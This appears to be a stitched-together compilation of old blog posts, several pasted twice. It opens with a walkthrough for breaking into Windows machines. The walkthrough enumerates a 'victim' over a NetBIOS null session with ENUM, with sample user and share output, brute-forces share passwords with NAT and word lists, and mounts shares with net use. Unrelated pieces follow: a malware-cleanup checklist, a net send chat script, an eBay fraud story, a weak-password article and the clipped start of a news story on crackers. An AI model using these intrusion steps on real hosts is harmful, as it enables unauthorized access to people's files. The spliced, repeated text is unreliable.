ENUM (works from command prompt):
usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)
If we type (in ENUM command prompt) enum -U -S -G 100.100.100.100 , ENUM 'll try to connect to victim with a null session (doesnt matter if we already did) and we 'll get some info about victim. See below for example.
server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.
NOTE: We can see from here the system name: AM2o, users: Administrator, Guest, Cynos, Sisqo, places sharing: IPC$ print$ C ADMIN$ C$ CanonCLC320, power users: AM2o, Cynos, Sisqo. You can use and the other commands to select more info if u like.
CIS (Cerberus Information Security):
Just set a host (without http://) or an ip (ex. 100.100.100.100), then go to "File" -> Select module and set "netbios checks". This 'll automatically select information. When completed, press view report. The advantage about CIS, is that when it finds a user, automatically try to find the password too (i'll explain later about passwords) if exists.
NOTE: The symbol $, indicates the hided places ex. $ADMIN is the %systemroot% (for windows NT and 2000 C:\winnt for XP C:\windows etc.). Those places are protected with passwords. So, try to avoid those places (for now). ex. if sharing places are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .
NAT (Netbios Auditing Tool):
This is a very good tool which 'll try to find the sharing places and get through the passes. It uses userlist and passlist that we define, so collect as many info as u can with ENUM and/or CIS.
Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100
NOTE: If password finally founded, we use net use k: \\ip\place * /u:user ex. net use k: \\100.100.100.100\C * /u:Cynos and when we asked for pass, just type it and u are connected. U 'll get "Command completed succesfully".
NOTE: Another one good tool like NAT, is PQwak2, which u can get it here.
Disable File Printer sharing.
• Click the Start Menu and choose Settings, Control Panel.
• Double-click the Network icon.
• Click the Configuration tab.
• Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
• Make sure that the following two boxes are NOT checked
"I want to be able to give others access to my files"
"I want to be able to allow others to print from my printers"
• Click the OK button in the File and Print Sharing dialog box.
• Click the OK button in the Network control panel.
A prompt box will appear requesting you to restart your computer.
(If no changes were made, this box may not appear.)
• Restart your computer for your new setting to take effect .
how to not get hacked
How Not To Get Hacked
Protect Urself !
Follow These Simple Guidelines n u are done
1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.
2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your anti virus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.
Good luck!
Protect Urself !
Follow These Simple Guidelines n u are done
1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.
2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your anti virus
5. Boot into safe mode and run all three scans
6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.
Good luck!
chat with ur friends
Have a Chat With Your Friends Without any software
Hey buddies or their buds, This a trick through which you can chat with your friends/enemies/or even to me.........without any software installed into your computer!
here it goes...........
1. All you need is your friends IP address and your Command Prompt.
2. Open your notepad and write tis code as it is.................. I would prefer you to copy this !
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3. Now save this as "Messenger.Bat".
4. Drag this file (.bat file)over to Command Prompt and press enter!
5. You would then see some thing like this:
MESSENGER
User:
6. After "User" type the IP address of the computer you want to contact.
7. Before you press "Enter" it should look like this:
MESSENGER
User: IP_Address
Message: Hi, How are you ?
8. Now all you need to do is press "Enter", and start chatting
Hey buddies or their buds, This a trick through which you can chat with your friends/enemies/or even to me.........without any software installed into your computer!
here it goes...........
1. All you need is your friends IP address and your Command Prompt.
2. Open your notepad and write tis code as it is.................. I would prefer you to copy this !
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3. Now save this as "Messenger.Bat".
4. Drag this file (.bat file)over to Command Prompt and press enter!
5. You would then see some thing like this:
MESSENGER
User:
6. After "User" type the IP address of the computer you want to contact.
7. Before you press "Enter" it should look like this:
MESSENGER
User: IP_Address
Message: Hi, How are you ?
8. Now all you need to do is press "Enter", and start chatting
Wednesday, January 9, 2008
Selling Your Laptop on eBay
My mother, a longtime flea-market shopper, says it's always easier to buy than to sell. Man oh man, is she right about that.
Twice in just over a week, my efforts to sell a laptop on eBay were thwarted. One effort climaxed in an excruciatingly anxious dash to the post office--to retrieve the laptop I had just shipped.
Here's the story, in a nutshell, followed by a few lessons learned.
Acting Without Authorization
In early 2007, I bought my sweet little Sony Vaio TXN19P/L ultraportable to use as a secondary computer. (Read my review of a similar Vaio laptop. It's been an ideal traveling companion: The laptop weighs just 2.8 pounds and goes for 5 hours or more on a charge. It has a gorgeous screen and beautiful Slate Blue carbon fiber casing--it truly is a masterpiece of industrial design.
The laptop was pricey, however. In January 2007 I paid $2800 for this model, which has 2GB of RAM, an 80GB hard drive, and Windows XP Professional. And so, in December, I decided to sell it. I felt it was time to try something new and…oh, all right: I needed the money. Plus, I have an older, less glamorous, but still working IBM ThinkPad 240 in my closet. Why not use that?
At any rate, I listed the Sony laptop on eBay on December 8, thinking it would catch the interest of holiday shoppers. I put a reserve price on the laptop as well as offered the "Buy It Now" option.
One week later, as the auction ended, the reserve price was met and the laptop sold. I boxed up the laptop, considering it a done deal. But two hours later, I received a message from eBay, informing me the listing had been "cancelled due to bidding activity that took place without the account owner's authorization."
And then eBay wiped out the listing. It was as if it had never existed. Worse, eBay informed me of the following: "Unfortunately, it is not possible for us to automatically relist these items for you. Instead, to relist these items you will need to start from the beginning of the listing process...We know that this is an inconvenience and we apologize for the negative impact it may cause you. We are working on tools to allow you to relist your items without starting from the beginning, but they are not available at this time."
In other words, to relist my laptop on eBay, I had to start all over again.
When I asked eBay about this, a spokesperson responded in e-mail: "The current process where we cancel the listing is optimized around immediately refunding the seller's full fees (listing fee and final value fee). We realize that this solution can also have its drawbacks--specifically the inconvenience to the seller of having their listing removed and also the inability to offer Second Chance Offers to any underbidders, which is way eBay is always looking for ways to improve its services to its users."
Bolting Like Batman
On December 17, a few days after the laptop's second listing appeared, someone from Indonesia contacted me via e-mail and asked if I would ship to Bali. I was hesitant, as I worried about Customs forms and other details I wouldn't have to deal with if selling to a U.S. buyer. I checked the potential buyer's eBay feedback--it was nearly 100 percent positive. So, even though I had reservations, I agreed to sell to him.
Minutes later, the man from Bali used the "Buy It Now" option to procure my laptop and pay me via PayPal. He urged me to ship it to him right away, to be sure he could get it in time for the holidays. At 1:19 p.m. (Pacific Standard Time), I received an e-mail from PayPal, informing me the funds were in my account. So I labeled the box containing the laptop and headed to the post office.
I groaned when I saw the long line at the post office, but I expected as much at this time of year. I filled out the necessary forms and waited in line for about 30 minutes. All told, everything went smoothly. Still, I wondered: Am I doing the right thing?
After returning home, I went back to work. Around 4:45 p.m., I checked my e-mail and discovered one from PayPal (sent at 4:16 p.m.). This one informed me that I "may have received an unauthorized payment...We have placed a temporary hold on the funds until the investigation is complete."
Dear reader, you should have seen me tearing out of my office, jumping into my car, and rocketing to the post office, like Batman out to save Gotham. Would my package still be there?, I fretted. Would they give it back to me?
When I arrived at the post office, it was about 5 p.m. The line was even longer now--nearly snaking out the door. I took my place at the end and fidgeted. What if a truck with my laptop on it is driving away at this very moment, while I'm standing in line?
I asked the person behind me to save my place in line. Then I dashed to the counter and told the clerk I had an emergency. Had their trucks picked up any packages in the last half hour or so? The clerk, who had no doubt seen a lot of foolishness that busy day, eyed me warily and said no, he didn't think so, but go to the back of the line.
For the next 45 minutes, while I waited in line, I took deep breaths and tried to remain calm. Finally, it was my turn, and after some explaining, I was mercifully reunited with my package and refunded the $61 shipping charges.
By the time I returned home, PayPal had determined the buyer had purchased my laptop fraudulently and had removed the deposit from my account.
Learning Lessons
I must admit this ordeal left me feeling a bit foolish. But I decided to write about my experience to underscore the potential peril of selling an expensive laptop over the Internet to a stranger.
On balance, I've sold dozens of things on eBay before and never experienced fraud. Once, someone didn't follow through on his winning bid, but that's the worst of it. And as an eBay buyer, I've never received anything that wasn't what I had expected.
Nonetheless, I've learned some valuable lessons. First: Trust my instincts. I didn't have a good feeling about the second buyer, and I was right. Second: In the future, I will wait 24 hours after receiving payment before I ship an item, especially for big-ticket items like a laptop. Granted, PayPal alerted me within 3 hours of the fraud. But had I not been able to react quickly, my laptop would have gone to Bali, and trying to get it back would have been a nightmare, if not an impossibility.
A few tips from PayPal regarding selling online:
Beware of unusual requests. Abnormal requests can be a sign of suspicious activity. A few examples include:
Rush shipments at any cost.
Partial payments from multiple PayPal accounts.
Payments not received in full.
Be extra cautious with high-priced items. It's fairly common for shipping addresses to differ from billing addresses. However, be extra cautious when sending high-priced items, especially if payment is received from one country and sent to another.
More tips are available from PayPal.
Next Steps
As for my Sony laptop? Call me a glutton for punishment, but I am going to give eBay one last try. And if this doesn't work, I may try selling it on Craigslist. Or I may just keep the laptop. It really is such a sweet little thing.
For More Information
Video: "EBay Goes Web 2.0"
"What EBay Tells Us about Pop Culture in 2007"
"Tips & Tweaks: All About eBay"
Mobile Computing News, Reviews, & Tips
First HD DVD-RW Laptop: Toshiba's newest Qosmio multimedia laptop is said to be the first with a rewritable HD DVD drive, plus two HDTV tuners. The $3500 laptop recently went on sale in Japan. Toshiba didn't announce overseas launch plans.
New Rules for Laptop Batteries: Beginning January 1, air travelers in the U.S. are prohibited from carrying spare lithium batteries in their checked baggage. The U.S. Department of Transportation's new regulations are designed to minimize the risk of fire, which lithium batteries have been suspected of causing in rare cases. It's okay to have a lithium battery installed in a device, such as a digital camera, in your checked baggage--you just can't have a battery floating around loose in your luggage. Also, you can still carry extra batteries in your carry-on bags, provided they are stored in their original packaging or in a plastic bag. For more details, read "US Bans Spare Lithium Batteries From Checked Bags."
Convert Your Media for the Road: Before you hit the road, you might want to transfer your favorite YouTube videos or TiVo recordings to your portable media player. While this isn't always a straightforward process--iTunes won't let you import DVDs, for example--there are software programs that can make it happen. For details read our step-by-step guide, "Master Your Media."
Suggestion Box
Is there a particularly cool mobile computing product or service I've missed? Got a spare story idea in your back pocket? Tell me about it. However, I regret that I'm unable to respond to tech-support questions, due to the volume of e-mail I receive.
Twice in just over a week, my efforts to sell a laptop on eBay were thwarted. One effort climaxed in an excruciatingly anxious dash to the post office--to retrieve the laptop I had just shipped.
Here's the story, in a nutshell, followed by a few lessons learned.
Acting Without Authorization
In early 2007, I bought my sweet little Sony Vaio TXN19P/L ultraportable to use as a secondary computer. (Read my review of a similar Vaio laptop. It's been an ideal traveling companion: The laptop weighs just 2.8 pounds and goes for 5 hours or more on a charge. It has a gorgeous screen and beautiful Slate Blue carbon fiber casing--it truly is a masterpiece of industrial design.
The laptop was pricey, however. In January 2007 I paid $2800 for this model, which has 2GB of RAM, an 80GB hard drive, and Windows XP Professional. And so, in December, I decided to sell it. I felt it was time to try something new and…oh, all right: I needed the money. Plus, I have an older, less glamorous, but still working IBM ThinkPad 240 in my closet. Why not use that?
At any rate, I listed the Sony laptop on eBay on December 8, thinking it would catch the interest of holiday shoppers. I put a reserve price on the laptop as well as offered the "Buy It Now" option.
One week later, as the auction ended, the reserve price was met and the laptop sold. I boxed up the laptop, considering it a done deal. But two hours later, I received a message from eBay, informing me the listing had been "cancelled due to bidding activity that took place without the account owner's authorization."
And then eBay wiped out the listing. It was as if it had never existed. Worse, eBay informed me of the following: "Unfortunately, it is not possible for us to automatically relist these items for you. Instead, to relist these items you will need to start from the beginning of the listing process...We know that this is an inconvenience and we apologize for the negative impact it may cause you. We are working on tools to allow you to relist your items without starting from the beginning, but they are not available at this time."
In other words, to relist my laptop on eBay, I had to start all over again.
When I asked eBay about this, a spokesperson responded in e-mail: "The current process where we cancel the listing is optimized around immediately refunding the seller's full fees (listing fee and final value fee). We realize that this solution can also have its drawbacks--specifically the inconvenience to the seller of having their listing removed and also the inability to offer Second Chance Offers to any underbidders, which is way eBay is always looking for ways to improve its services to its users."
Bolting Like Batman
On December 17, a few days after the laptop's second listing appeared, someone from Indonesia contacted me via e-mail and asked if I would ship to Bali. I was hesitant, as I worried about Customs forms and other details I wouldn't have to deal with if selling to a U.S. buyer. I checked the potential buyer's eBay feedback--it was nearly 100 percent positive. So, even though I had reservations, I agreed to sell to him.
Minutes later, the man from Bali used the "Buy It Now" option to procure my laptop and pay me via PayPal. He urged me to ship it to him right away, to be sure he could get it in time for the holidays. At 1:19 p.m. (Pacific Standard Time), I received an e-mail from PayPal, informing me the funds were in my account. So I labeled the box containing the laptop and headed to the post office.
I groaned when I saw the long line at the post office, but I expected as much at this time of year. I filled out the necessary forms and waited in line for about 30 minutes. All told, everything went smoothly. Still, I wondered: Am I doing the right thing?
After returning home, I went back to work. Around 4:45 p.m., I checked my e-mail and discovered one from PayPal (sent at 4:16 p.m.). This one informed me that I "may have received an unauthorized payment...We have placed a temporary hold on the funds until the investigation is complete."
Dear reader, you should have seen me tearing out of my office, jumping into my car, and rocketing to the post office, like Batman out to save Gotham. Would my package still be there?, I fretted. Would they give it back to me?
When I arrived at the post office, it was about 5 p.m. The line was even longer now--nearly snaking out the door. I took my place at the end and fidgeted. What if a truck with my laptop on it is driving away at this very moment, while I'm standing in line?
I asked the person behind me to save my place in line. Then I dashed to the counter and told the clerk I had an emergency. Had their trucks picked up any packages in the last half hour or so? The clerk, who had no doubt seen a lot of foolishness that busy day, eyed me warily and said no, he didn't think so, but go to the back of the line.
For the next 45 minutes, while I waited in line, I took deep breaths and tried to remain calm. Finally, it was my turn, and after some explaining, I was mercifully reunited with my package and refunded the $61 shipping charges.
By the time I returned home, PayPal had determined the buyer had purchased my laptop fraudulently and had removed the deposit from my account.
Learning Lessons
I must admit this ordeal left me feeling a bit foolish. But I decided to write about my experience to underscore the potential peril of selling an expensive laptop over the Internet to a stranger.
On balance, I've sold dozens of things on eBay before and never experienced fraud. Once, someone didn't follow through on his winning bid, but that's the worst of it. And as an eBay buyer, I've never received anything that wasn't what I had expected.
Nonetheless, I've learned some valuable lessons. First: Trust my instincts. I didn't have a good feeling about the second buyer, and I was right. Second: In the future, I will wait 24 hours after receiving payment before I ship an item, especially for big-ticket items like a laptop. Granted, PayPal alerted me within 3 hours of the fraud. But had I not been able to react quickly, my laptop would have gone to Bali, and trying to get it back would have been a nightmare, if not an impossibility.
A few tips from PayPal regarding selling online:
Beware of unusual requests. Abnormal requests can be a sign of suspicious activity. A few examples include:
Rush shipments at any cost.
Partial payments from multiple PayPal accounts.
Payments not received in full.
Be extra cautious with high-priced items. It's fairly common for shipping addresses to differ from billing addresses. However, be extra cautious when sending high-priced items, especially if payment is received from one country and sent to another.
More tips are available from PayPal.
Next Steps
As for my Sony laptop? Call me a glutton for punishment, but I am going to give eBay one last try. And if this doesn't work, I may try selling it on Craigslist. Or I may just keep the laptop. It really is such a sweet little thing.
For More Information
Video: "EBay Goes Web 2.0"
"What EBay Tells Us about Pop Culture in 2007"
"Tips & Tweaks: All About eBay"
Mobile Computing News, Reviews, & Tips
First HD DVD-RW Laptop: Toshiba's newest Qosmio multimedia laptop is said to be the first with a rewritable HD DVD drive, plus two HDTV tuners. The $3500 laptop recently went on sale in Japan. Toshiba didn't announce overseas launch plans.
New Rules for Laptop Batteries: Beginning January 1, air travelers in the U.S. are prohibited from carrying spare lithium batteries in their checked baggage. The U.S. Department of Transportation's new regulations are designed to minimize the risk of fire, which lithium batteries have been suspected of causing in rare cases. It's okay to have a lithium battery installed in a device, such as a digital camera, in your checked baggage--you just can't have a battery floating around loose in your luggage. Also, you can still carry extra batteries in your carry-on bags, provided they are stored in their original packaging or in a plastic bag. For more details, read "US Bans Spare Lithium Batteries From Checked Bags."
Convert Your Media for the Road: Before you hit the road, you might want to transfer your favorite YouTube videos or TiVo recordings to your portable media player. While this isn't always a straightforward process--iTunes won't let you import DVDs, for example--there are software programs that can make it happen. For details read our step-by-step guide, "Master Your Media."
Suggestion Box
Is there a particularly cool mobile computing product or service I've missed? Got a spare story idea in your back pocket? Tell me about it. However, I regret that I'm unable to respond to tech-support questions, due to the volume of e-mail I receive.
How I’d Hack Your Weak Passwords
If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?
Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
The last 4 digits of your social security number.
123 or 1234 or 123456.
“password”
Your city, or college, football team name.
Date of birth - yours, your partner’s or your child’s.
“god”
“letmein”
“money”
“love”
Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
You probably use the same password for lots of stuff right?
Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 - whatever makes you happy) different usernames and passwords as fast as possible.
Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities - or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters - like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.
Password Length
All Characters
Only Lowercase
3 characters4 characters5 characters6 characters7 characters8 characters9 characters10 characters11 characters12 characters13 characters14 characters
0.86 seconds1.36 minutes2.15 hours8.51 days2.21 years2.10 centuries20 millennia1,899 millennia180,365 millennia17,184,705 millennia1,627,797,068 millennia154,640,721,434 millennia
0.02 seconds.046 seconds11.9 seconds5.15 minutes2.23 hours2.42 days2.07 months4.48 years1.16 centuries3.03 millennia78.7 millennia2,046 millennia
Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable - but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0′, or even better an ‘@’ or ‘*’. (i.e. - m0d3ltf0rd… like modelTford)
Randomly throw in capital letters (i.e. - Mod3lTF0rd)
Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
Since it can be difficult to remember a ton of passwords, I recommend using Roboform. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
EDIT: By request I’ve created a short RoboForm Demonstration video. It ain’t great, but I guess it’s better than nothing. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network - after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.
Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
The last 4 digits of your social security number.
123 or 1234 or 123456.
“password”
Your city, or college, football team name.
Date of birth - yours, your partner’s or your child’s.
“god”
“letmein”
“money”
“love”
Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
You probably use the same password for lots of stuff right?
Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 - whatever makes you happy) different usernames and passwords as fast as possible.
Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities - or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters - like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.
Password Length
All Characters
Only Lowercase
3 characters4 characters5 characters6 characters7 characters8 characters9 characters10 characters11 characters12 characters13 characters14 characters
0.86 seconds1.36 minutes2.15 hours8.51 days2.21 years2.10 centuries20 millennia1,899 millennia180,365 millennia17,184,705 millennia1,627,797,068 millennia154,640,721,434 millennia
0.02 seconds.046 seconds11.9 seconds5.15 minutes2.23 hours2.42 days2.07 months4.48 years1.16 centuries3.03 millennia78.7 millennia2,046 millennia
Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable - but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0′, or even better an ‘@’ or ‘*’. (i.e. - m0d3ltf0rd… like modelTford)
Randomly throw in capital letters (i.e. - Mod3lTF0rd)
Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
Since it can be difficult to remember a ton of passwords, I recommend using Roboform. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
EDIT: By request I’ve created a short RoboForm Demonstration video. It ain’t great, but I guess it’s better than nothing. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network - after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.
HOW `CRACKERS' CRACK
Mercury News Computing Editor Police, prosecutors and most of the press call them "hackers." Computer cognoscenti prefer the term "crackers." Both sides are talking about the same people, typically young men, whose fascination with computers leads them to gain access to computers where they don't belong. A few crackers make headlines, like Robert T. Morris Jr., son of a top computer security expert for the supersecret National Security Agency, who let loose a "worm" program on a national network of university, research and government computers in 1988. There are also notorious crackers like Kevin Mitnick, who was under investigation at the age of 13 for illegally obtaining free long-distance phone calls and was sentenced to prison in 1989 for computer break-ins. Then there are legions of far more ordinary crackers who simply use their knowledge of computers to "explore" intriguing corporate or government computers or simply to go for the electronic equivalent of a joy ride and impress their friends. But they all share something: an air of mystery. How do they do it? At a recent conference on computer freedom and privacy, computer expert Russell L. Brand gave a four-hour lecture on the inner workings of computer cracking. His basic message: Cracking is not as hard as it seems to an outsider, and it often goes undetected by legitimate users of "cracked" computers. "Just because you don't see a problem is no reason to think a problem hasn't occurred," Brand said. "Generally it's a month to six weeks before (operators) notice anything happened and usually because the cracker accidentally broke something." Home computers aren't in danger from crackers because they aren't accessible to outsiders--and because they aren't 